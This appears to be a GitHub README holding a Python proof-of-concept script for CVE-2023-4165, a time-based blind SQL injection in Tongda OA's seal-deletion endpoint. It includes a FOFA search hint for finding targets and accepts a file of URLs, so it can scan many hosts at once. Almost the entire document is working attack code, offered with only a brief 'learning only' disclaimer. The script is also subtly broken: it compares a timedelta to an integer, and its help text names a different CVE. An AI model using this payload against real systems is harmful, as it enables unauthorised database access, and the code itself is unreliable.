README.md
Rendering markdown...
import requests
import argparse
#fofa: 通达 OA
# 通达 OA_CVE-2023-4165sql 注入漏洞
def Banner():
banner = """
_____ __ __ ______ ___ ___ ___ ____ _ _ __ __ _____
/ ____| \ \ / / | ____| |__ \ / _ \ |__ \ |___ \ | || | /_ | / / | ____|
| | \ \ / / | |__ ______ ) | | | | | ) | __) | ______ | || |_ | | / /_ | |__
| | \ \/ / | __| |______| / / | | | | / / |__ < |______| |__ _| | | | '_ \ |___ \
| |____ \ / | |____ / /_ | |_| | / /_ ___) | | | | | | (_) | ___) |
\_____| \/ |______| |____| \___/ |____| |____/ |_| |_| \___/ |____/
tag: 通达 OA_CVE-2023-4165sql 注入漏洞 POC
@version: 1.0.0 @author by ghhycsec
仅限学习使用,请勿用于非法测试!
"""
print(banner)
def poc(url):
payload = "/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=("
if "http" not in url:
url = "http://" + url
fullpath = url + payload
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101Firefox/116.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zhHK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
try:
response = requests.get(fullpath, headers=header)
if response.elapsed > 13:
print("[+]%s 存在失 CVE-2023-4165 sql 注入"% (url) )
else:
print("[-]%s 不存在失 CVE-2023-4165 sql 注入" % (url) )
except Exception as e:
print(e)
def main():
Banner()
parser = argparse.ArgumentParser(description="CVE-2023-2648 检测工具 脚本使用phpinfo文件上传")
parser.add_argument("-u", "--target", help="单个目标URL")
parser.add_argument("-f", "--file", help="包含多个目标URL的文件")
args = parser.parse_args()
if args.target:
target_urls = [args.target]
elif args.file:
with open(args.file, "r") as f:
target_urls = f.read().splitlines()
else:
print("请使用 -u 或 -f 指定目标")
return
for url in target_urls:
poc(url)
if __name__ == "__main__":
main()